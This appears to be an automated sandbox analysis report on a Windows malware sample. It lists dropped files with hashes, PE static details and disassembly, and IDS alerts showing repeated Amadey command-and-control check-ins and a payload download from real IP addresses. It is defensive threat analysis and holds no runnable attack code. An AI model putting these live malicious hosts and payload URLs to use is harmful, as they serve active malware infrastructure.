                                                                                                                                          Size (bytes):144848
                                                                                                                                          Entropy (8bit):6.539750563864442
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:UAf6suip+d7FEk/oJz69sFaXeu9CoT2nIVFetBWsqeFwdMIo:p6PbsF4CoT2OeU4SMB
                                                                                                                                          MD5:A2EE53DE9167BF0D6C019303B7CA84E5
                                                                                                                                          SHA1:2A3C737FA1157E8483815E98B666408A18C0DB42
                                                                                                                                          SHA-256:43536ADEF2DDCC811C28D35FA6CE3031029A2424AD393989DB36169FF2995083
                                                                                                                                          SHA-512:45B56432244F86321FA88FBCCA6A0D2A2F7F4E0648C1D7D7B1866ADC9DAA5EDDD9F6BB73662149F279C9AB60930DAD1113C8337CB5E6EC9EED5048322F65F7D8
                                                                                                                                          Malicious:false
                                                                                                                                          IE Cache URL:http://78.47.81.226/softokn3.dll
                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....b.[.........."!.........b...............................................P............@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\152138533219.jpg
                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):4768287
                                                                                                                                          Entropy (8bit):7.896086900501099
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:49152:PZtZtZtZtZtZtZJ4JcAUu0ZtZR3ZR3ZR3ZR3ZR3Z2ZR3ZR3Blc55vBZR3ZR3ZR3f:x333333J4m4i3HHHHHUHZc55v7HHH1
                                                                                                                                          MD5:6EB928BE746DF50A2951EB079E168219
                                                                                                                                          SHA1:D612C16BF5B516F64BA45849527BBF81D3948623
                                                                                                                                          SHA-256:45E57ABD87A31D0A8EA3F4D0DF01F529A89A4E3735D85BD166F4F5C68121F9C6
                                                                                                                                          SHA-512:E59AF8EE06244AD882D03E66DEE06A584D456DF0061B77B03A44C53989D8A13BE419C8AD2DC6B94C6111C60A8430733EAE1C6AA8A41FC30B2EEFFC066F8300D0
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: ......JFIF.............C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..P./..R..w\..5.\i...G.zu{....S.....;/..V.e..OP.H.<Q.+.....r...COp..V0.&..8"............]|J....\.....(....I5.g.m..X....h..(V.....).j.}........c..x..o.Z.....|/.{........+.<........I...].....n1..'.."..P.)y-X...&.$}.*.?.=..&...vW.>E.U.Ev...g_.......kB.y.Y..Y7..........;..8<.\[o.].e..s..E.....?.....)r..vW..D.K'jn..b..M.ND>..~.....4.|7u.{...t...>.e_..*|.o.9..
                                                                                                                                          C:\Users\user\AppData\Local\Temp\15213853321935212556
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          File Type:empty
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):0
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3::
                                                                                                                                          MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                          SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                          SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                          SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:
                                                                                                                                          C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Process:C:\ProgramData\M7WCJ84VE5TXJ0R4.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):290304
                                                                                                                                          Entropy (8bit):6.9441301701352725
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:QyRnLkiC4K+lDKzhQd22R+hb8L6COx6bHpk:7IiC4K6H0bK1oIHp
                                                                                                                                          MD5:31AB82365078548DCEA62DA7C2380B2E
                                                                                                                                          SHA1:712FBB4DF005439B9810090FD3A2962848E252C4
                                                                                                                                          SHA-256:B5A399C0EA40983ABC68B828CCB14EFDE2DB90C047BBFBA9AE418317CE7F036D
                                                                                                                                          SHA-512:937BFD9845CC25A6739B8DF0CAC685C5499F4D55D5F70FFF5CE61A4569B7BE96D84E987E001B8E8109200C485F681BCC86911A29CC5E5E45B978DBACE7DA2CE3
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u..1h..1h..1h../:$.*h../:2.Nh../:5..h......6h..1h..h../:;.0h../:#.0h../:%.0h../: .0h..Rich1h..........................PE..L....b.^.................8..........C-.......P....@..........................0..........................................b...,~..P....0..............................0R..............................@s..@............P...............................text....6.......8.................. ..`.rdata..r9...P...:...<..............@..@.data................v..............@....rsrc........0.......v..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          Static File Info

                                                                                                                                          General

                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Entropy (8bit):7.707494278122921
                                                                                                                                          TrID:
                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                                                          • Clipper DOS Executable (2020/12) 0.02%
                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                          • VXD Driver (31/22) 0.00%
                                                                                                                                          File name:wKYTg7Gp6P.exe
                                                                                                                                          File size:573952
                                                                                                                                          MD5:c4c7d74ca7c0fc1511a82b040a274549
                                                                                                                                          SHA1:b0b1f42d887a07d4bfae6b1e63900bad822b0908
                                                                                                                                          SHA256:84343112791c187d10af9cea8fac68cf4fc03d72352f1fe2def0bf72f9a9afc7
                                                                                                                                          SHA512:b80b2ed76607715f3660626151b8445d28bc5a87e33cdd91a1750341b3b7f94f2b0dbb13d17246e1fbe6f1a53299c31cfbfc5c9d49c27542c2cd27cac5c3e558
                                                                                                                                          SSDEEP:12288:2iUfDc6TRMmHKj+ZOZhFTCnegEey4UI7hSux8eE8NE:jC/BqjSOfFTCLxFjyH8NE
                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L.....6^...........

                                                                                                                                          File Icon

                                                                                                                                          Icon Hash:dab1e4c0ecb9c7b8

                                                                                                                                          Static PE Info

                                                                                                                                          General

                                                                                                                                          Entrypoint:0x402649
                                                                                                                                          Entrypoint Section:.text
                                                                                                                                          Digitally signed:false
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          Subsystem:windows gui
                                                                                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                                                                          Time Stamp:0x5E36CEE3 [Sun Feb 2 13:30:11 2020 UTC]
                                                                                                                                          TLS Callbacks:
                                                                                                                                          CLR (.Net) Version:
                                                                                                                                          OS Version Major:5
                                                                                                                                          OS Version Minor:0
                                                                                                                                          File Version Major:5
                                                                                                                                          File Version Minor:0
                                                                                                                                          Subsystem Version Major:5
                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                          Import Hash:330a62607dc728cb3596dbc4235ea785

                                                                                                                                          Entrypoint Preview

                                                                                                                                          Instruction
                                                                                                                                          call 00007F30F4FFA95Bh
                                                                                                                                          jmp 00007F30F4FF675Eh
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          mov ecx, dword ptr [esp+04h]
                                                                                                                                          test ecx, 00000003h
                                                                                                                                          je 00007F30F4FF6906h
                                                                                                                                          mov al, byte ptr [ecx]
                                                                                                                                          add ecx, 01h
                                                                                                                                          test al, al
                                                                                                                                          je 00007F30F4FF6930h
                                                                                                                                          test ecx, 00000003h
                                                                                                                                          jne 00007F30F4FF68D1h
                                                                                                                                          add eax, 00000000h
                                                                                                                                          lea esp, dword ptr [esp+00000000h]
                                                                                                                                          lea esp, dword ptr [esp+00000000h]
                                                                                                                                          mov eax, dword ptr [ecx]
                                                                                                                                          mov edx, 7EFEFEFFh
                                                                                                                                          add edx, eax
                                                                                                                                          xor eax, FFFFFFFFh
                                                                                                                                          xor eax, edx
                                                                                                                                          add ecx, 04h
                                                                                                                                          test eax, 81010100h
                                                                                                                                          je 00007F30F4FF68CAh
                                                                                                                                          mov eax, dword ptr [ecx-04h]
                                                                                                                                          test al, al
                                                                                                                                          je 00007F30F4FF6914h
                                                                                                                                          test ah, ah
                                                                                                                                          je 00007F30F4FF6906h
                                                                                                                                          test eax, 00FF0000h
                                                                                                                                          je 00007F30F4FF68F5h
                                                                                                                                          test eax, FF000000h
                                                                                                                                          je 00007F30F4FF68E4h
                                                                                                                                          jmp 00007F30F4FF68AFh
                                                                                                                                          lea eax, dword ptr [ecx-01h]
                                                                                                                                          mov ecx, dword ptr [esp+04h]
                                                                                                                                          sub eax, ecx
                                                                                                                                          ret
                                                                                                                                          lea eax, dword ptr [ecx-02h]
                                                                                                                                          mov ecx, dword ptr [esp+04h]
                                                                                                                                          sub eax, ecx
                                                                                                                                          ret
                                                                                                                                          lea eax, dword ptr [ecx-03h]
                                                                                                                                          mov ecx, dword ptr [esp+04h]
                                                                                                                                          sub eax, ecx
                                                                                                                                          ret
                                                                                                                                          lea eax, dword ptr [ecx-04h]
                                                                                                                                          mov ecx, dword ptr [esp+04h]
                                                                                                                                          sub eax, ecx
                                                                                                                                          ret
                                                                                                                                          mov edi, edi
                                                                                                                                          push ebp
                                                                                                                                          mov ebp, esp
                                                                                                                                          sub esp, 20h
                                                                                                                                          mov eax, dword ptr [ebp+08h]
                                                                                                                                          push esi
                                                                                                                                          push edi
                                                                                                                                          push 00000008h
                                                                                                                                          pop ecx
                                                                                                                                          mov esi, 004B02D0h
                                                                                                                                          lea edi, dword ptr [ebp-20h]
                                                                                                                                          rep movsd
                                                                                                                                          mov dword ptr [ebp-08h], eax
                                                                                                                                          mov eax, dword ptr [ebp+0Ch]
                                                                                                                                          pop edi
                                                                                                                                          mov dword ptr [ebp-04h], eax
                                                                                                                                          pop esi

                                                                                                                                          Data Directories

                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xb376c0x50.new
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xb50000x17f8.rsrc
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xb70000x16f0.reloc
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0xb2a980x18.new
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb2a500x40.new
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0xb00000x198.new
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                          Sections

                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                          .text0x10000x7f28d0x7f400False0.89262992694data7.88074668674IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                          .data0x810000x2c1d80x4e00False0.0998096955128data1.18468072777IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                          .mijoza0xae0000x1790x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                          .tls0xaf0000x90x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                          .new0xb00000x40c80x4200False0.376893939394data5.34015207286IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                          .rsrc0xb50000x17f80x1800False0.70361328125data6.0156191445IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                          .reloc0xb70000x1d6a0x1e00False0.627994791667data5.75714521169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                          Resources

                                                                                                                                          NameRVASizeTypeLanguageCountry
                                                                                                                                          RT_ICON0xb51300x10a8dataEnglishUnited States
                                                                                                                                          RT_STRING0xb63a80x44cdataUzbekCyrillic
                                                                                                                                          RT_GROUP_ICON0xb61d80x14dataEnglishUnited States
                                                                                                                                          RT_VERSION0xb61f00x1b8COM executable for DOS

                                                                                                                                          Imports

                                                                                                                                          DLLImport
                                                                                                                                          KERNEL32.dllFreeLibrary, SystemTimeToTzSpecificLocalTime, InterlockedIncrement, GetConsoleAliasA, GetModuleHandleExW, ConnectNamedPipe, GetTickCount, SetFileTime, TerminateThread, GetLocaleInfoW, SetSystemTimeAdjustment, GetFileAttributesA, GetTimeFormatW, SetTimeZoneInformation, GetAtomNameW, FindResourceW, RaiseException, SetLastError, GetProcAddress, OpenWaitableTimerA, LocalAlloc, SetConsoleOutputCP, GlobalFindAtomW, SetConsoleCursorInfo, GetModuleHandleA, LoadLibraryExA, FindAtomW, FileTimeToLocalFileTime, GetCurrentProcessId, CompareStringW, CompareStringA, lstrcatA, MapViewOfFile, GetModuleHandleW, Sleep, ExitProcess, GetStartupInfoW, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, GetLastError, HeapFree, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, InterlockedDecrement, GetCurrentThread, WriteFile, GetStdHandle, GetModuleFileNameA, DeleteCriticalSection, LeaveCriticalSection, FatalAppExitA, EnterCriticalSection, SetConsoleCtrlHandler, InterlockedExchange, LoadLibraryA, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, HeapCreate, HeapDestroy, VirtualFree, QueryPerformanceCounter, GetSystemTimeAsFileTime, VirtualAlloc, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetLocaleInfoA, WideCharToMultiByte, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetTimeFormatA, GetDateFormatA, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, GetTimeZoneInformation, SetEnvironmentVariableA
                                                                                                                                          USER32.dllGetDesktopWindow
                                                                                                                                          ADVAPI32.dllRegCreateKeyW

                                                                                                                                          Version Infos

                                                                                                                                          DescriptionData
                                                                                                                                          LegalCopyrightWsekde
                                                                                                                                          InternalNamesgalimatimot
                                                                                                                                          FileVersion7.0.2.54
                                                                                                                                          ProductVersion7.0.21.21
                                                                                                                                          Translations0x0138 0x1ff3

                                                                                                                                          Possible Origin

                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                          EnglishUnited States
                                                                                                                                          UzbekCyrillic

                                                                                                                                          Network Behavior

                                                                                                                                          Snort IDS Alerts

                                                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                          04/28/21-22:58:52.372241TCP2021697ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious4974480192.168.2.489.184.92.210
                                                                                                                                          04/28/21-22:59:10.222388TCP2027700ET TROJAN Amadey CnC Check-In4975080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:10.540480TCP2027700ET TROJAN Amadey CnC Check-In4975280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:10.858910TCP2027700ET TROJAN Amadey CnC Check-In4975380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:11.172408TCP2027700ET TROJAN Amadey CnC Check-In4975480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:11.480580TCP2027700ET TROJAN Amadey CnC Check-In4975580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:11.785012TCP2027700ET TROJAN Amadey CnC Check-In4975680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:12.109806TCP2027700ET TROJAN Amadey CnC Check-In4975780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:12.426002TCP2027700ET TROJAN Amadey CnC Check-In4975880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:12.749296TCP2027700ET TROJAN Amadey CnC Check-In4975980192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:13.224732TCP2027700ET TROJAN Amadey CnC Check-In4976080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:13.536020TCP2027700ET TROJAN Amadey CnC Check-In4976180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:13.846182TCP2027700ET TROJAN Amadey CnC Check-In4976280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:14.534196TCP2027700ET TROJAN Amadey CnC Check-In4976380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:14.955260TCP2027700ET TROJAN Amadey CnC Check-In4976480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:15.731310TCP2027700ET TROJAN Amadey CnC Check-In4976580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:16.347454TCP2027700ET TROJAN Amadey CnC Check-In4976680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:16.671982TCP2027700ET TROJAN Amadey CnC Check-In4976780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:16.981094TCP2027700ET TROJAN Amadey CnC Check-In4976880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:17.284667TCP2027700ET TROJAN Amadey CnC Check-In4976980192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:17.598478TCP2027700ET TROJAN Amadey CnC Check-In4977080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:17.921405TCP2027700ET TROJAN Amadey CnC Check-In4977180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:18.234110TCP2027700ET TROJAN Amadey CnC Check-In4977280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:18.544042TCP2027700ET TROJAN Amadey CnC Check-In4977380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:18.865421TCP2027700ET TROJAN Amadey CnC Check-In4977480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:19.192478TCP2027700ET TROJAN Amadey CnC Check-In4977580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:19.501440TCP2027700ET TROJAN Amadey CnC Check-In4977680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:19.817761TCP2027700ET TROJAN Amadey CnC Check-In4977780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:20.123038TCP2027700ET TROJAN Amadey CnC Check-In4977880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:20.421419TCP2027700ET TROJAN Amadey CnC Check-In4977980192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:20.741419TCP2027700ET TROJAN Amadey CnC Check-In4978080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:21.066979TCP2027700ET TROJAN Amadey CnC Check-In4978180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:21.378845TCP2027700ET TROJAN Amadey CnC Check-In4978380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:21.502484TCP100000118COMMUNITY WEB-CLIENT Internet Explorer URLMON.DLL Content-Type Overflow Attempt8049782176.111.174.114192.168.2.4
                                                                                                                                          04/28/21-22:59:21.704830TCP2027700ET TROJAN Amadey CnC Check-In4978480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:22.030292TCP2027700ET TROJAN Amadey CnC Check-In4978580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:22.342422TCP2027700ET TROJAN Amadey CnC Check-In4978780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:22.657373TCP2027700ET TROJAN Amadey CnC Check-In4978980192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:22.965889TCP2027700ET TROJAN Amadey CnC Check-In4979080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:23.285708TCP2027700ET TROJAN Amadey CnC Check-In4979180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:23.594204TCP2027700ET TROJAN Amadey CnC Check-In4979380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:23.904932TCP2027700ET TROJAN Amadey CnC Check-In4979480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:24.222855TCP2027700ET TROJAN Amadey CnC Check-In4979580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:24.539024TCP2027700ET TROJAN Amadey CnC Check-In4979680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:24.846404TCP2027700ET TROJAN Amadey CnC Check-In4979780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:25.163521TCP2027700ET TROJAN Amadey CnC Check-In4979880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:25.493153TCP2027700ET TROJAN Amadey CnC Check-In4979980192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:25.792899TCP2027700ET TROJAN Amadey CnC Check-In4980080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:26.093440TCP2027700ET TROJAN Amadey CnC Check-In4980180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:26.413189TCP2027700ET TROJAN Amadey CnC Check-In4980280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:26.724427TCP2027700ET TROJAN Amadey CnC Check-In4980380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:27.032350TCP2027700ET TROJAN Amadey CnC Check-In4980480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:27.347110TCP2027700ET TROJAN Amadey CnC Check-In4980580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:27.655445TCP2027700ET TROJAN Amadey CnC Check-In4980680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:27.967937TCP2027700ET TROJAN Amadey CnC Check-In4980780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:28.278501TCP2027700ET TROJAN Amadey CnC Check-In4980880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:28.580668TCP2027700ET TROJAN Amadey CnC Check-In4980980192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:28.894852TCP2027700ET TROJAN Amadey CnC Check-In4981080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:29.208331TCP2027700ET TROJAN Amadey CnC Check-In4981180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:29.517535TCP2027700ET TROJAN Amadey CnC Check-In4981280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:29.831133TCP2027700ET TROJAN Amadey CnC Check-In4981380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:30.141640TCP2027700ET TROJAN Amadey CnC Check-In4981480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:30.534422TCP2027700ET TROJAN Amadey CnC Check-In4981580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:30.861617TCP2027700ET TROJAN Amadey CnC Check-In4981680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:31.171793TCP2027700ET TROJAN Amadey CnC Check-In4981780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:31.490046TCP2027700ET TROJAN Amadey CnC Check-In4981880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:31.846140TCP2027700ET TROJAN Amadey CnC Check-In4981980192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:32.434592TCP2027700ET TROJAN Amadey CnC Check-In4982080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:33.193332TCP2027700ET TROJAN Amadey CnC Check-In4982180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:33.744238TCP2027700ET TROJAN Amadey CnC Check-In4982280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:35.128179TCP2027700ET TROJAN Amadey CnC Check-In4982380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:35.440060TCP2027700ET TROJAN Amadey CnC Check-In4982680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:35.749244TCP2027700ET TROJAN Amadey CnC Check-In4982780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:36.063797TCP2027700ET TROJAN Amadey CnC Check-In4983080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:36.380536TCP2027700ET TROJAN Amadey CnC Check-In4983180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:36.694013TCP2027700ET TROJAN Amadey CnC Check-In4983380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:37.022661TCP2027700ET TROJAN Amadey CnC Check-In4983580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:37.331137TCP2027700ET TROJAN Amadey CnC Check-In4983880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:37.655920TCP2027700ET TROJAN Amadey CnC Check-In4983980192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:37.989101TCP2027700ET TROJAN Amadey CnC Check-In4984180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:38.300671TCP2027700ET TROJAN Amadey CnC Check-In4984280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:38.610358TCP2027700ET TROJAN Amadey CnC Check-In4984480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:38.938213TCP2027700ET TROJAN Amadey CnC Check-In4984680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:39.269417TCP2027700ET TROJAN Amadey CnC Check-In4984880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:39.591569TCP2027700ET TROJAN Amadey CnC Check-In4985080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:39.906859TCP2027700ET TROJAN Amadey CnC Check-In4985180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:40.225920TCP2027700ET TROJAN Amadey CnC Check-In4985380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:40.533088TCP2027700ET TROJAN Amadey CnC Check-In4985580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:40.841883TCP2027700ET TROJAN Amadey CnC Check-In4985680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:41.144257TCP2027700ET TROJAN Amadey CnC Check-In4985780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:41.461703TCP2027700ET TROJAN Amadey CnC Check-In4985980192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:41.784514TCP2027700ET TROJAN Amadey CnC Check-In4986180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:42.098555TCP2027700ET TROJAN Amadey CnC Check-In4986380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:42.403166TCP2027700ET TROJAN Amadey CnC Check-In4986480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:42.712897TCP2027700ET TROJAN Amadey CnC Check-In4986680192.168.2.4176.111.174.114
